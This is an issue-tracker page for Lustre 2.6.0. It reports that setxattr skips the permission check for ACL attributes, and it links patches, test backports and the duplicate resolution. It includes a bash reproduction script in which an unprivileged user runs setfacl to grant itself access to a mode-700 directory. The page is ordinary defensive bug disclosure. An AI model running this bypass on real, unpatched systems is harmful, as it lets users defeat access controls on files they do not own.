Details
-
Bug
-
Resolution: Duplicate
-
Blocker
-
Lustre 2.6.0
-
3
-
12939
Description
Setxattr does not check the permission when setting ACL xattrs. This
will cause security problem because any user can walk around permission
checking by changing ACL rules.
Following script will reproduce this problem.
#!/bin/bash
DIR=/mnt/lustre/dir
- we can got this from Lustre/test
RUNAS=./runas
rmdir $DIR
if [ -e $DIR ]; then
echo "Please remove $DIR"
exit 1
fi
mkdir $DIR
if [ ! -d $DIR ]; then
echo "Faled to mkdir $DIR"
exit 1
fi
chmod 700 $DIR
$RUNAS -u test ls $DIR
if [ $? -eq 0 ]; then
echo "Permission error"
exit 1
fi
$RUNAS -u test setfacl -m u:test:rwx $DIR
if [ $? -ne 0 ]; then
echo "Probelm not reproduced because setfacl failed"
exit 1
fi
echo "Probelm reproduced!!"
$RUNAS -u test ls $DIR
if [ $? -ne 0 ]; then
echo "ACL does not work!"
exit 1
fi
echo "Security problem!!"
Attachments
Issue Links
Activity
| Fix Version/s | New: Lustre 2.5.1 [ 10608 ] | |
| Fix Version/s | Original: Lustre 2.5.2 [ 10645 ] |
| Labels | Original: mn4 patch | New: patch |
| Fix Version/s | New: Lustre 2.4.3 [ 10652 ] |
The patch to enable acl/974.test and acl/2561.test is here: http://review.whamcloud.com/9541
| Labels | Original: mn4 mq114 mq214 patch | New: mn4 patch |
| Resolution | New: Duplicate [ 3 ] | |
| Status | Original: Open [ 1 ] | New: Resolved [ 5 ] |
Emoly, I also see that acl/974.test and acl/2561.test are not included in the lustre/tests/Makefile.am nobase_noinst_DATA list, and those tests are being skipped. Could you please make a separate patch to add them to the list so they are in the RPM, and fix the test to fail if the test scripts are missing.
backport sanity/103 (http://review.whamcloud.com/9541) tests to b2_5:
http://review.whamcloud.com/10512